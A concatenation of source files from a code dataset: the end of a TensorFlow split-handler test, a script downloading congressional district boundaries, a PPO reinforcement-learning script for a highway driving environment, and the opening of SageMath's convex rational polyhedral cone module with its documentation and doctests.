with ops.control_dependencies([update_2]):
are_splits_ready2, partitions, gains, splits = (
split_handler.make_splits(np.int64(1), np.int64(2), class_id))
# Now the feature in the second batch is not empty, but buckets
# calculated on the first batch are empty.
are_splits_ready2, partitions, gains, splits = (
sess.run(
[are_splits_ready2, partitions, gains, splits],
feed_dict={sparse_column: non_empty_sparse_column}))
self.assertFalse(are_splits_ready)
self.assertTrue(are_splits_ready2)
# Since the buckets were empty, we can't calculate the splits.
self.assertEqual(len(partitions), 0)
self.assertEqual(len(gains), 0)
self.assertEqual(len(splits), 0)
def testDegenerativeCase(self):
with self.cached_session() as sess:
# Only one data example, hence one leaf and thus one quantile bucket. The
# same situation arises when all examples have the same values. This case
# used to cause a failure.
gradients = array_ops.constant([0.2])
hessians = array_ops.constant([0.12])
example_partitions = array_ops.constant([1], dtype=dtypes.int32)
indices = array_ops.constant([[0, 0]], dtype=dtypes.int64)
values = array_ops.constant([0.58])
sparse_column = sparse_tensor.SparseTensor(indices, values, [1, 1])
gradient_shape = tensor_shape.scalar()
hessian_shape = tensor_shape.scalar()
class_id = -1
split_handler = ordinal_split_handler.SparseSplitHandler(
l1_regularization=0.0,
l2_regularization=2.0,
tree_complexity_regularization=0.0,
min_node_weight=0.0,
epsilon=0.01,
num_quantiles=2,
feature_column_group_id=0,
sparse_float_column=sparse_column,
init_stamp_token=0,
gradient_shape=gradient_shape,
hessian_shape=hessian_shape,
multiclass_strategy=learner_pb2.LearnerConfig.TREE_PER_CLASS)
resources.initialize_resources(resources.shared_resources()).run()
empty_gradients, empty_hessians = get_empty_tensors(
gradient_shape, hessian_shape)
example_weights = array_ops.ones([1, 1], dtypes.float32)
update_1 = split_handler.update_stats_sync(
0,
example_partitions,
gradients,
hessians,
empty_gradients,
empty_hessians,
example_weights,
is_active=array_ops.constant([True, True]))
with ops.control_dependencies([update_1]):
are_splits_ready = split_handler.make_splits(
np.int64(0), np.int64(1), class_id)[0]
with ops.control_dependencies([are_splits_ready]):
update_2 = split_handler.update_stats_sync(
1,
example_partitions,
gradients,
hessians,
empty_gradients,
empty_hessians,
example_weights,
is_active=array_ops.constant([True, True]))
with ops.control_dependencies([update_2]):
are_splits_ready2, partitions, gains, splits = (
split_handler.make_splits(np.int64(1), np.int64(2), class_id))
are_splits_ready, are_splits_ready2, partitions, gains, splits = (
sess.run([
are_splits_ready, are_splits_ready2, partitions, gains, splits
]))
# During the first iteration, inequality split handlers are not going to
# have any splits. Make sure that we return not_ready in that case.
self.assertFalse(are_splits_ready)
self.assertTrue(are_splits_ready2)
self.assertAllEqual([1], partitions)
self.assertAllEqual([0.0], gains)
split_info = split_info_pb2.SplitInfo()
split_info.ParseFromString(splits[0])
split_node = split_info.split_node.sparse_float_binary_split_default_left
self.assertEqual(0, split_node.split.feature_column)
self.assertAllClose(0.58, split_node.split.threshold)
if __name__ == "__main__":
googletest.main()
| 39.792584 | 84 | 0.648088 |
4a1b546537429976973144cd5dd9fd191f2278b5
| 671 |
py
|
Python
|
src/fetchDistricts.py
|
syedhassaanahmed/legis-graph
|
8656102c53902added7def7cfe046182df086684
|
[
"MIT"
] | 50 |
2015-09-21T15:49:26.000Z
|
2021-12-23T17:54:07.000Z
|
src/fetchDistricts.py
|
syedhassaanahmed/legis-graph
|
8656102c53902added7def7cfe046182df086684
|
[
"MIT"
] | 15 |
2015-09-21T02:07:18.000Z
|
2019-04-15T01:30:53.000Z
|
src/fetchDistricts.py
|
syedhassaanahmed/legis-graph
|
8656102c53902added7def7cfe046182df086684
|
[
"MIT"
] | 22 |
2015-10-01T06:53:01.000Z
|
2020-12-11T01:41:46.000Z
|
'''
Fetch simplified WKT boundaries for 2014 congressional districts and
save in CSV format:
state,district,polygon
'''
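# Illustrative example of one output row (values are hypothetical; the WKT
# field gets quoted by csv.writer since it contains commas):
# NY,10,"MULTIPOLYGON (((-74.0 40.7, ...)))"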
import requests
import csv
BASE_URL = "https://gis.govtrack.us"
CD_2014_URL = "/boundaries/cd-2014/?limit=500"
# get meta boundary
r = requests.get(BASE_URL + CD_2014_URL)
j = r.json()
boundaries = j['objects']
with open('cb_2014_districts.csv', 'w') as f:
writer = csv.writer(f)
writer.writerow(['state', 'district', 'polygon'])
for b in boundaries:
p = str.split(b['name'], '-')
r = requests.get(BASE_URL + b['url'] + 'simple_shape?format=wkt')
wkt = r.text
writer.writerow([p[0], p[1], wkt])
| 22.366667 | 73 | 0.648286 |
4a1b556a1881de67b1c5f93b93fda4e81aa63bc1
| 3,530 |
py
|
Python
|
src/policy_gradient/PPO/ppo_highway.py
|
hougiebear/Deepdrive-Autonomous-Vehicles
|
6b952c9e5d01893dc4319bbd74b9fa951719fcf9
|
[
"MIT"
] | 1 |
2021-12-27T02:22:27.000Z
|
2021-12-27T02:22:27.000Z
|
src/policy_gradient/PPO/ppo_highway.py
|
hougiebear/Deepdrive-Autonomous-Vehicles
|
6b952c9e5d01893dc4319bbd74b9fa951719fcf9
|
[
"MIT"
] | null | null | null |
src/policy_gradient/PPO/ppo_highway.py
|
hougiebear/Deepdrive-Autonomous-Vehicles
|
6b952c9e5d01893dc4319bbd74b9fa951719fcf9
|
[
"MIT"
] | null | null | null |
import gym
import highway_env
import numpy as np
import argparse
from stable_baselines3 import PPO
from stable_baselines3.common.noise import NormalActionNoise
from stable_baselines3.common.results_plotter import load_results, ts2xy
import matplotlib.pyplot as plt
from stable_baselines3.common import results_plotter
from stable_baselines3.common.env_util import make_vec_env
params = {
"environment": "highway-v0",
"model_name": "PPO",
"train_steps": 200000,
"batch_size": 32,
"clip_range": 0.1,
"ent_coef": 0.00007,
"gae_lambda": 9,
"gamma": 0.95,
"learning_rate": 0.00087,
"max_grad_norm": 0.9,
"n_epochs": 20,
"n_steps": 128,
"sde_sample_freq": 64,
"vf_coef": 0.557588101099478,
"policy": "MlpPolicy"
}
policy_kwargs = dict(net_arch=[128, 128])
env = gym.make(params.get("environment"))
multi_env = make_vec_env(params.get("environment"), n_envs=4)
exp_name = params.get("model_name") + "_train_" + params.get("environment")
log_dir = '../../../logs/' + exp_name
def train(params):
model = PPO(params.get("policy"), env,
verbose=1,
tensorboard_log=log_dir,
batch_size=params.get("batch_size"),
clip_range=params.get("clip_range"),
ent_coef= params.get("ent_coef"),
gae_lambda=params.get("gae_lambda"),
gamma=params.get("gamma"),
learning_rate=params.get("learning_rate"),
max_grad_norm=params.get("max_grad_norm"),
n_epochs=params.get("n_epochs"),
n_steps=params.get("n_steps"),
sde_sample_freq=params.get("sde_sample_freq"),
vf_coef=params.get("vf_coef")
,policy_kwargs=dict(net_arch=[128, 128])
)
# Train for the configured number of timesteps
model.learn(total_timesteps=params.get("train_steps"))
# Save the trained agent
model.save(exp_name)
def evaluate(params):
# Load saved model
model = PPO.load(exp_name, env=env)
results = np.zeros(shape=(0,0))
obs = env.reset()
# Evaluate the agent
episode_reward = 0
for _ in range(params.get("test_episodes", 100)):  # "test_episodes" is not set in params above; 100 is an assumed fallback
action, _ = model.predict(obs, deterministic=True)
obs, reward, done, info = env.step(action)
episode_reward += reward
if done or info.get('is_success', False):
episode_reward = 0.0
obs = env.reset()
result = ("Reward:", episode_reward, "Success?", info.get('is_success', True))
results = np.append(results, result, axis=None)
def moving_average(values, window):
"""
Smooth values by doing a moving average
:param values: (numpy array)
:param window: (int)
:return: (numpy array)
"""
weights = np.repeat(1.0, window) / window
return np.convolve(values, weights, 'valid')
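# For example (illustrative): moving_average(np.array([1, 2, 3, 4, 5]), 2)
# returns array([1.5, 2.5, 3.5, 4.5]).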
def plot_results(log_dir, title='Learning Curve'):
"""
plot the results
:param log_dir: (str) the save location of the results to plot
:param title: (str) the title of the task to plot
"""
x, y = ts2xy(load_results(log_dir), 'timesteps')
y = moving_average(y, window=50)
# Truncate x
x = x[len(x) - len(y):]
fig = plt.figure(title)
plt.plot(x, y)
plt.xlabel('Number of Timesteps')
plt.ylabel('Rewards')
plt.title(title + " Smoothed")
plt.show()
def sb3_plot():
results_plotter.plot_results([log_dir], 1e5, results_plotter.X_TIMESTEPS, exp_name)
train(params)
#evaluate(params)
| 28.699187 | 87 | 0.632578 |
4a1b567a6b0135d4fd100753f6f2fa1f745ad6fb
| 239,906 |
py
|
Python
|
src/sage/geometry/cone.py
|
abcijkxyz/sage
|
6ec717a56dcb0fd629ca850d9b9391ea8d96ccac
|
[
"BSL-1.0"
] | null | null | null |
src/sage/geometry/cone.py
|
abcijkxyz/sage
|
6ec717a56dcb0fd629ca850d9b9391ea8d96ccac
|
[
"BSL-1.0"
] | null | null | null |
src/sage/geometry/cone.py
|
abcijkxyz/sage
|
6ec717a56dcb0fd629ca850d9b9391ea8d96ccac
|
[
"BSL-1.0"
] | null | null | null |
# -*- coding: utf-8 -*-
r"""
Convex rational polyhedral cones
This module was designed as part of the framework for toric varieties
(:mod:`~sage.schemes.toric.variety`,
:mod:`~sage.schemes.toric.fano_variety`). While the emphasis is on
strictly convex cones, non-strictly convex cones are supported as well. Work
with distinct lattices (in the sense of discrete subgroups spanning vector
spaces) is supported. The default lattice is :class:`ToricLattice
<sage.geometry.toric_lattice.ToricLatticeFactory>` `N` of the appropriate
dimension. The only case when you must specify the lattice explicitly is the
creation of a 0-dimensional cone, where the dimension of the ambient space
cannot be guessed.
AUTHORS:
- Andrey Novoseltsev (2010-05-13): initial version.
- Andrey Novoseltsev (2010-06-17): substantial improvement during review by
Volker Braun.
- Volker Braun (2010-06-21): various spanned/quotient/dual lattice
computations added.
- Volker Braun (2010-12-28): Hilbert basis for cones.
- Andrey Novoseltsev (2012-02-23): switch to PointCollection container.
EXAMPLES:
Use :func:`Cone` to construct cones::
sage: octant = Cone([(1,0,0), (0,1,0), (0,0,1)])
sage: halfspace = Cone([(1,0,0), (0,1,0), (-1,-1,0), (0,0,1)])
sage: positive_xy = Cone([(1,0,0), (0,1,0)])
sage: four_rays = Cone([(1,1,1), (1,-1,1), (-1,-1,1), (-1,1,1)])
For all of the cones above we have provided primitive generating rays, but in
fact this is not necessary - a cone can be constructed from any collection of
rays (from the same space, of course). If there are non-primitive (or even
non-integral) rays, they will be replaced with primitive ones. If there are
extra rays, they will be discarded. Of course, this means that :func:`Cone`
has to do some work before actually constructing the cone and sometimes it is
not desirable, if you know for sure that your input is already "good". In this
case you can use options ``check=False`` to force :func:`Cone` to use
exactly the directions that you have specified and ``normalize=False`` to
force it to use exactly the rays that you have specified. However, it is
better not to use these possibilities without necessity, since cones are
assumed to be represented by a minimal set of primitive generating rays.
See :func:`Cone` for further documentation on construction.
Once you have a cone, you can perform numerous operations on it. The most
important ones are, probably, ray accessing methods::
sage: rays = halfspace.rays()
sage: rays
N( 0, 0, 1),
N( 0, 1, 0),
N( 0, -1, 0),
N( 1, 0, 0),
N(-1, 0, 0)
in 3-d lattice N
sage: rays.set()
frozenset({N(-1, 0, 0), N(0, -1, 0), N(0, 0, 1), N(0, 1, 0), N(1, 0, 0)})
sage: rays.matrix()
[ 0 0 1]
[ 0 1 0]
[ 0 -1 0]
[ 1 0 0]
[-1 0 0]
sage: rays.column_matrix()
[ 0 0 0 1 -1]
[ 0 1 -1 0 0]
[ 1 0 0 0 0]
sage: rays(3)
N(1, 0, 0)
in 3-d lattice N
sage: rays[3]
N(1, 0, 0)
sage: halfspace.ray(3)
N(1, 0, 0)
The method :meth:`~IntegralRayCollection.rays` returns a
:class:`~sage.geometry.point_collection.PointCollection` with the
`i`-th element being the primitive integral generator of the `i`-th
ray. It is possible to convert this collection to a matrix with either
rows or columns corresponding to these generators. You may also change
the default
:meth:`~sage.geometry.point_collection.PointCollection.output_format`
of all point collections to be such a matrix.
If you want to do something with each ray of a cone, you can write ::
sage: for ray in positive_xy: print(ray)
N(1, 0, 0)
N(0, 1, 0)
There are two dimensions associated to each cone - the dimension of the
subspace spanned by the cone and the dimension of the space where it lives::
sage: positive_xy.dim()
2
sage: positive_xy.lattice_dim()
3
You also may be interested in this dimension::
sage: dim(positive_xy.linear_subspace())
0
sage: dim(halfspace.linear_subspace())
2
Or, perhaps, all you care about is whether it is zero or not::
sage: positive_xy.is_strictly_convex()
True
sage: halfspace.is_strictly_convex()
False
You can also perform these checks::
sage: positive_xy.is_simplicial()
True
sage: four_rays.is_simplicial()
False
sage: positive_xy.is_smooth()
True
You can work with subcones that form faces of other cones::
sage: face = four_rays.faces(dim=2)[0]
sage: face
2-d face of 3-d cone in 3-d lattice N
sage: face.rays()
N(-1, -1, 1),
N(-1, 1, 1)
in 3-d lattice N
sage: face.ambient_ray_indices()
(2, 3)
sage: four_rays.rays(face.ambient_ray_indices())
N(-1, -1, 1),
N(-1, 1, 1)
in 3-d lattice N
If you need to know inclusion relations between faces, you can use ::
sage: L = four_rays.face_lattice()
sage: [len(s) for s in L.level_sets()]
[1, 4, 4, 1]
sage: face = L.level_sets()[2][0]
sage: face.rays()
N(1, 1, 1),
N(1, -1, 1)
in 3-d lattice N
sage: L.hasse_diagram().neighbors_in(face)
[1-d face of 3-d cone in 3-d lattice N,
1-d face of 3-d cone in 3-d lattice N]
.. WARNING::
The order of faces in level sets of
the face lattice may differ from the order of faces returned by
:meth:`~ConvexRationalPolyhedralCone.faces`. While the first order is
random, the latter one ensures that one-dimensional faces are listed in
the same order as generating rays.
When all the functionality provided by cones is not enough, you may want to
check if you can do necessary things using polyhedra corresponding to cones::
sage: four_rays.polyhedron()
A 3-dimensional polyhedron in ZZ^3 defined as
the convex hull of 1 vertex and 4 rays
And of course you are always welcome to suggest new features that should be
added to cones!
REFERENCES:
- [Ful1993]_
"""
# ****************************************************************************
# Copyright (C) 2010-2014 Volker Braun <vbraun.name@gmail.com>
# Copyright (C) 2010-2018 Andrey Novoseltsev <novoselt@gmail.com>
# Copyright (C) 2010 William Stein <wstein@gmail.com>
# Copyright (C) 2012 Christian Stump
# Copyright (C) 2014-2018 Frédéric Chapoton
# Copyright (C) 2014 Peter Bruin
# Copyright (C) 2015-2017 Jori Mäntysalo
# Copyright (C) 2015-2020 Michael Orlitzky
# Copyright (C) 2016-2020 John H. Palmieri
# Copyright (C) 2018 David Coudert
# Copyright (C) 2019-2020 Jonathan Kliem
# Copyright (C) 2020-2021 Matthias Koeppe
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 2 of the License, or
# (at your option) any later version.
# https://www.gnu.org/licenses/
# ****************************************************************************
from collections.abc import Hashable, Iterable, Container
from copy import copy
from warnings import warn
from sage.arith.all import gcd, lcm
from sage.combinat.posets.posets import FinitePoset
from sage.geometry.point_collection import PointCollection
from sage.geometry.polyhedron.constructor import Polyhedron
from sage.geometry.polyhedron.base import is_Polyhedron
from sage.geometry.hasse_diagram import lattice_from_incidences
from sage.geometry.toric_lattice import (ToricLattice, is_ToricLattice,
is_ToricLatticeQuotient)
from sage.geometry.toric_plotter import ToricPlotter, label_list
from sage.geometry.relative_interior import RelativeInterior
from sage.graphs.digraph import DiGraph
from sage.matrix.constructor import matrix
from sage.matrix.matrix_space import MatrixSpace
from sage.matrix.special import column_matrix
from sage.misc.cachefunc import cached_method
from sage.misc.flatten import flatten
from sage.misc.latex import latex
from sage.modules.free_module import span, VectorSpace
from sage.modules.free_module_element import vector
from sage.rings.integer_ring import ZZ
from sage.rings.rational_field import QQ
from sage.structure.all import SageObject, parent
from sage.structure.richcmp import richcmp_method, richcmp
from sage.geometry.integral_points import parallelotope_points
from sage.geometry.convex_set import ConvexSet_closed
import sage.geometry.abc
from sage.misc.lazy_import import lazy_import
from sage.features import PythonModule
lazy_import('ppl', ['C_Polyhedron', 'Generator_System', 'Constraint_System',
'Linear_Expression', 'Poly_Con_Relation'],
feature=PythonModule("ppl", spkg="pplpy"))
lazy_import('ppl', ['ray', 'point'], as_=['PPL_ray', 'PPL_point'],
feature=PythonModule("ppl", spkg="pplpy"))
def is_Cone(x):
r"""
Check if ``x`` is a cone.
INPUT:
- ``x`` -- anything.
OUTPUT:
- ``True`` if ``x`` is a cone and ``False`` otherwise.
EXAMPLES::
sage: from sage.geometry.cone import is_Cone
sage: is_Cone(1)
False
sage: quadrant = Cone([(1,0), (0,1)])
sage: quadrant
2-d cone in 2-d lattice N
sage: is_Cone(quadrant)
True
"""
return isinstance(x, ConvexRationalPolyhedralCone)
def Cone(rays, lattice=None, check=True, normalize=True):
r"""
Construct a (not necessarily strictly) convex rational polyhedral cone.
INPUT:
- ``rays`` -- a list of rays. Each ray should be given as a list
or a vector convertible to the rational extension of the given
``lattice``. May also be specified by a
:class:`~sage.geometry.polyhedron.base.Polyhedron_base` object;
- ``lattice`` -- :class:`ToricLattice
<sage.geometry.toric_lattice.ToricLatticeFactory>`, `\ZZ^n`, or any
other object that behaves like these. If not specified, an attempt will
be made to determine an appropriate toric lattice automatically;
- ``check`` -- by default the input data will be checked for
correctness (e.g. that all rays have the same number of
components) and generating rays will be constructed from
``rays``. If you know that the input is a minimal set of
generators of a valid cone, you may significantly decrease
construction time using ``check=False`` option;
- ``normalize`` -- you can further speed up construction using
``normalize=False`` option. In this case ``rays`` must be a list of
immutable primitive rays in ``lattice``. In general, you should not use
this option, it is designed for code optimization and does not give as
drastic improvement in speed as the previous one.
OUTPUT:
- convex rational polyhedral cone determined by ``rays``.
EXAMPLES:
Let's define a cone corresponding to the first quadrant of the plane
(note, you can even mix objects of different types to represent rays, as
long as you let this function to perform all the checks and necessary
conversions!)::
sage: quadrant = Cone([(1,0), [0,1]])
sage: quadrant
2-d cone in 2-d lattice N
sage: quadrant.rays()
N(1, 0),
N(0, 1)
in 2-d lattice N
If you give more rays than necessary, the extra ones will be discarded::
sage: Cone([(1,0), (0,1), (1,1), (0,1)]).rays()
N(0, 1),
N(1, 0)
in 2-d lattice N
However, this work is not done with ``check=False`` option, so use it
carefully! ::
sage: Cone([(1,0), (0,1), (1,1), (0,1)], check=False).rays()
N(1, 0),
N(0, 1),
N(1, 1),
N(0, 1)
in 2-d lattice N
Even worse things can happen with ``normalize=False`` option::
sage: Cone([(1,0), (0,1)], check=False, normalize=False)
Traceback (most recent call last):
...
AttributeError: 'tuple' object has no attribute 'parent'
You can construct different "not" cones: not full-dimensional, not
strictly convex, not containing any rays::
sage: one_dimensional_cone = Cone([(1,0)])
sage: one_dimensional_cone.dim()
1
sage: half_plane = Cone([(1,0), (0,1), (-1,0)])
sage: half_plane.rays()
N( 0, 1),
N( 1, 0),
N(-1, 0)
in 2-d lattice N
sage: half_plane.is_strictly_convex()
False
sage: origin = Cone([(0,0)])
sage: origin.rays()
Empty collection
in 2-d lattice N
sage: origin.dim()
0
sage: origin.lattice_dim()
2
You may construct the cone above without giving any rays, but in this case
you must provide ``lattice`` explicitly::
sage: origin = Cone([])
Traceback (most recent call last):
...
ValueError: lattice must be given explicitly if there are no rays!
sage: origin = Cone([], lattice=ToricLattice(2))
sage: origin.dim()
0
sage: origin.lattice_dim()
2
sage: origin.lattice()
2-d lattice N
However, the trivial cone in ``n`` dimensions has a predefined
constructor for you to use::
sage: origin = cones.trivial(2)
sage: origin.rays()
Empty collection
in 2-d lattice N
Of course, you can also provide ``lattice`` in other cases::
sage: L = ToricLattice(3, "L")
sage: c1 = Cone([(1,0,0),(1,1,1)], lattice=L)
sage: c1.rays()
L(1, 0, 0),
L(1, 1, 1)
in 3-d lattice L
Or you can construct cones from rays of a particular lattice::
sage: ray1 = L(1,0,0)
sage: ray2 = L(1,1,1)
sage: c2 = Cone([ray1, ray2])
sage: c2.rays()
L(1, 0, 0),
L(1, 1, 1)
in 3-d lattice L
sage: c1 == c2
True
When the cone in question is not strictly convex, the standard form for
the "generating rays" of the linear subspace is "basis vectors and their
negatives", as in the following example::
sage: plane = Cone([(1,0), (0,1), (-1,-1)])
sage: plane.rays()
N( 0, 1),
N( 0, -1),
N( 1, 0),
N(-1, 0)
in 2-d lattice N
The cone can also be specified by a
:class:`~sage.geometry.polyhedron.base.Polyhedron_base`::
sage: p = plane.polyhedron()
sage: Cone(p)
2-d cone in 2-d lattice N
sage: Cone(p) == plane
True
TESTS::
sage: N = ToricLattice(2)
sage: Nsub = N.span([ N(1,2) ])
sage: Cone(Nsub.basis())
1-d cone in Sublattice <N(1, 2)>
sage: Cone([N(0)])
0-d cone in 2-d lattice N
"""
# Cone from Polyhedron
if is_Polyhedron(rays):
polyhedron = rays
if lattice is None:
lattice = ToricLattice(polyhedron.ambient_dim())
if polyhedron.n_vertices() > 1:
raise ValueError("%s is not a cone!" % polyhedron)
apex = polyhedron.vertices()[0]
if apex.count(0) != len(apex):
raise ValueError("the apex of %s is not at the origin!"
% polyhedron)
rays = normalize_rays(polyhedron.rays(), lattice)
for line in normalize_rays(polyhedron.lines(), lattice):
rays.append(line)
rays.append(-line)
rays[-1].set_immutable()
return ConvexRationalPolyhedralCone(rays, lattice)
# Cone from rays
if check or normalize:
rays = normalize_rays(rays, lattice)
if lattice is None:
if rays:
lattice = rays[0].parent()
else:
raise ValueError(
"lattice must be given explicitly if there are no rays!")
if not check or not rays:
return ConvexRationalPolyhedralCone(rays, lattice)
# Any set of rays forms a cone, but we want to keep only generators
if is_ToricLatticeQuotient(lattice):
gs = Generator_System(
PPL_point(Linear_Expression(lattice(0).vector(), 0)))
for r in rays:
if not r.is_zero():
gs.insert(PPL_ray(Linear_Expression(r.vector(), 0)))
else:
gs = Generator_System( PPL_point(Linear_Expression(lattice(0),0)) )
for r in rays:
if not r.is_zero():
gs.insert( PPL_ray(Linear_Expression(r,0)) )
cone = C_Polyhedron(gs)
return _Cone_from_PPL(cone, lattice, rays)
def _Cone_from_PPL(cone, lattice, original_rays=None):
r"""
Construct a cone from a :class:`~ppl.polyhedron.Polyhedron`.
This is a private function and not intended to be exposed to the
end user. It is used internally by :func:`Cone` and in
:meth:`ConvexRationalPolyhedralCone.intersection`.
INPUT:
- ``cone`` -- a :class:`~ppl.polyhedron.Polyhedron` having the
origin as its single point.
- ``lattice`` -- :class:`ToricLattice
<sage.geometry.toric_lattice.ToricLatticeFactory>`, `\ZZ^n`, or any
other object that behaves like these.
- ``original_rays`` -- (default: ``None``) if given, must be a minimal list
of normalized generating rays of ``cone``. If ``cone`` is strictly convex
and ``original_rays`` were given, they will be used as internal rays of
the constructed cone, in the given order.
OUTPUT:
A :class:`ConvexRationalPolyhedralCone`.
TESTS::
sage: Cone([(1,0), (0,1), (1,1), (0,1)]).rays() # indirect doctest
N(0, 1),
N(1, 0)
in 2-d lattice N
"""
rays = []
lines = []
for g in cone.minimized_generators():
if g.is_ray():
rays.append(g)
if g.is_line():
lines.append(g)
if (original_rays is not None and not lines and
len(rays) == len(original_rays)):
return ConvexRationalPolyhedralCone(original_rays, lattice, PPL=cone)
else:
rays = [ray.coefficients() for ray in rays]
for line in lines:
rays.append(line.coefficients())
rays.append(-vector(ZZ, rays[-1]))
try:
for i, ray in enumerate(rays):
rays[i] = lattice(ray)
rays[i].set_immutable()
except TypeError:
rays = normalize_rays(rays, lattice)
return ConvexRationalPolyhedralCone(rays, lattice, PPL=cone)
def _ambient_space_point(body, data):
r"""
Try to convert ``data`` to a point of the ambient space of ``body``.
INPUT:
- ``body`` -- a cone, fan, or lattice polytope with ``lattice()`` method
- ``data`` -- anything
OUTPUT:
An integral, rational, real algebraic, or numeric point of the
ambient space of ``body`` is returned if ``data`` were
successfully interpreted in such a way. A ``TypeError`` is raised
otherwise.
TESTS::
sage: from sage.geometry.cone import _ambient_space_point
sage: c = Cone([(1,0), (0,1)])
sage: _ambient_space_point(c, [1,1])
N(1, 1)
sage: _ambient_space_point(c, vector(ZZ,[1,1]))
N(1, 1)
sage: _ambient_space_point(c, c.dual_lattice()([1,1]))
Traceback (most recent call last):
...
TypeError: the point M(1, 1) and
2-d cone in 2-d lattice N have incompatible lattices
sage: _ambient_space_point(c, [1,1/3])
(1, 1/3)
sage: _ambient_space_point(c, vector(QQ,[1,1/3]))
(1, 1/3)
sage: _ambient_space_point(c, [1/2,1/sqrt(3)])
(1/2, 0.5773502691896258?)
sage: _ambient_space_point(c, vector(AA,[1/2,1/sqrt(3)]))
(1/2, 0.5773502691896258?)
sage: _ambient_space_point(c, [1,1,3])
Traceback (most recent call last):
...
TypeError: [1, 1, 3] does not represent a valid point
in the ambient space of 2-d cone in 2-d lattice N
sage: _ambient_space_point(c, vector(ZZ,[1,1,3]))
Traceback (most recent call last):
...
TypeError: (1, 1, 3) does not represent a valid point
in the ambient space of 2-d cone in 2-d lattice N
Ensure that transcendental elements can, at the very least, be
represented numerically::
sage: from sage.geometry.cone import _ambient_space_point
sage: c = Cone([(1,0), (0,1)])
sage: _ambient_space_point(c, [1, pi])
(1.00000000000000, 3.14159265358979)
sage: _ambient_space_point(c, vector(SR,[1, pi]))
(1.00000000000000, 3.14159265358979)
"""
L = body.lattice()
def try_base_extend(ring):
# Factor out the "try this ring..." code that's repeated four
# times.
try:
return L.base_extend(ring)(data)
except TypeError:
pass
except ValueError as ex:
if str(ex).startswith("Cannot coerce"):
pass
# Special treatment for toric lattice elements
p = try_base_extend(ZZ)
if p is not None:
return p
if is_ToricLattice(parent(data)):
raise TypeError("the point %s and %s have incompatible "
"lattices" % (data, body))
# If we don't have a lattice element, try successively
# less-desirable ambient spaces until (as a last resort) we
# attempt a numerical representation.
from sage.rings.qqbar import AA
from sage.rings.real_mpfr import RR
for ring in [QQ, AA, RR]:
p = try_base_extend(ring)
if p is not None:
return p
# Raise TypeError with our own message
raise TypeError("%s does not represent a valid point in the ambient "
"space of %s" % (data, body))
def integral_length(v):
"""
Compute the integral length of a given rational vector.
INPUT:
- ``v`` -- any object which can be converted to a list of rationals
OUTPUT:
Rational number ``r`` such that ``v = r * u``, where ``u`` is the
primitive integral vector in the direction of ``v``.
EXAMPLES::
sage: from sage.geometry.cone import integral_length
sage: integral_length([1, 2, 4])
1
sage: integral_length([2, 2, 4])
2
sage: integral_length([2/3, 2, 4])
2/3
"""
data = [QQ(e) for e in list(v)]
ns = [e.numerator() for e in data]
ds = [e.denominator() for e in data]
return gcd(ns) / lcm(ds)
def normalize_rays(rays, lattice):
r"""
Normalize a list of rational rays: make them primitive and immutable.
INPUT:
- ``rays`` -- list of rays which can be converted to the rational
extension of ``lattice``;
- ``lattice`` -- :class:`ToricLattice
<sage.geometry.toric_lattice.ToricLatticeFactory>`, `\ZZ^n`, or any
other object that behaves like these. If ``None``, an attempt will
be made to determine an appropriate toric lattice automatically.
OUTPUT:
- list of immutable primitive vectors of the ``lattice`` in the same
directions as original ``rays``.
EXAMPLES::
sage: from sage.geometry.cone import normalize_rays
sage: normalize_rays([(0, 1), (0, 2), (3, 2), (5/7, 10/3)], None)
[N(0, 1), N(0, 1), N(3, 2), N(3, 14)]
sage: L = ToricLattice(2, "L")
sage: normalize_rays([(0, 1), (0, 2), (3, 2), (5/7, 10/3)], L.dual())
[L*(0, 1), L*(0, 1), L*(3, 2), L*(3, 14)]
sage: ray_in_L = L(0,1)
sage: normalize_rays([ray_in_L, (0, 2), (3, 2), (5/7, 10/3)], None)
[L(0, 1), L(0, 1), L(3, 2), L(3, 14)]
sage: normalize_rays([(0, 1), (0, 2), (3, 2), (5/7, 10/3)], ZZ^2)
[(0, 1), (0, 1), (3, 2), (3, 14)]
sage: normalize_rays([(0, 1), (0, 2), (3, 2), (5/7, 10/3)], ZZ^3)
Traceback (most recent call last):
...
TypeError: cannot convert (0, 1) to
Vector space of dimension 3 over Rational Field!
sage: normalize_rays([], ZZ^3)
[]
"""
if rays is None:
rays = []
try:
rays = list(rays)
except TypeError:
raise TypeError(
"rays must be given as a list or a compatible structure!"
"\nGot: %s" % rays)
if rays:
if lattice is None:
ray_parent = parent(rays[0])
lattice = (ray_parent if is_ToricLattice(ray_parent)
else ToricLattice(len(rays[0])))
if lattice.base_ring() is not ZZ:
raise TypeError("lattice must be a free module over ZZ")
# Are we dealing with a quotient lattice?
try:
if not lattice.is_torsion_free():
raise ValueError("cannot normalize rays of torsion quotients!")
except AttributeError:
pass
V = None
try:
if lattice.is_ambient():
# Handle the most common case efficiently.
V = lattice.base_extend(QQ)
length = integral_length
except AttributeError:
pass
if V is None:
# Use a more general, but slower way.
V = lattice.vector_space_span_of_basis(lattice.basis())
length = lambda ray: integral_length(V.coordinate_vector(ray))
for n, ray in enumerate(rays):
try:
if isinstance(ray, (list, tuple, V.element_class)):
ray = V(ray)
else:
ray = V(list(ray))
except TypeError:
raise TypeError("cannot convert %s to %s!" % (ray, V))
if ray.is_zero():
ray = lattice(0)
else:
ray = lattice(ray / length(ray))
ray.set_immutable()
rays[n] = ray
return rays
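# Illustrative sketch of the normalization above (comments only): the ray
# (5/7, 10/3) has integral length gcd(5, 10) / lcm(7, 3) = 5/21, so dividing by
# it gives the primitive lattice vector (5/7, 10/3) / (5/21) = (3, 14), which is
# the value shown in the EXAMPLES block.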
@richcmp_method
class IntegralRayCollection(SageObject, Hashable, Iterable):
r"""
Create a collection of integral rays.
.. WARNING::
No correctness check or normalization is performed on the input data.
This class is designed for internal operations and you probably should
not use it directly.
This is a base class for :class:`convex rational polyhedral cones
<ConvexRationalPolyhedralCone>` and :class:`fans
<sage.geometry.fan.RationalPolyhedralFan>`.
Ray collections are immutable, but they cache most of the returned values.
INPUT:
- ``rays`` -- list of immutable vectors in ``lattice``;
- ``lattice`` -- :class:`ToricLattice
<sage.geometry.toric_lattice.ToricLatticeFactory>`, `\ZZ^n`, or any
other object that behaves like these. If ``None``, it will be determined
as :func:`parent` of the first ray. Of course, this cannot be done if
there are no rays, so in this case you must give an appropriate
``lattice`` directly. Note that ``None`` is *not* the default value -
you always *must* give this argument explicitly, even if it is ``None``.
OUTPUT:
- collection of given integral rays.
"""
def __init__(self, rays, lattice):
r"""
See :class:`IntegralRayCollection` for documentation.
TESTS::
sage: from sage.geometry.cone import (
....: IntegralRayCollection)
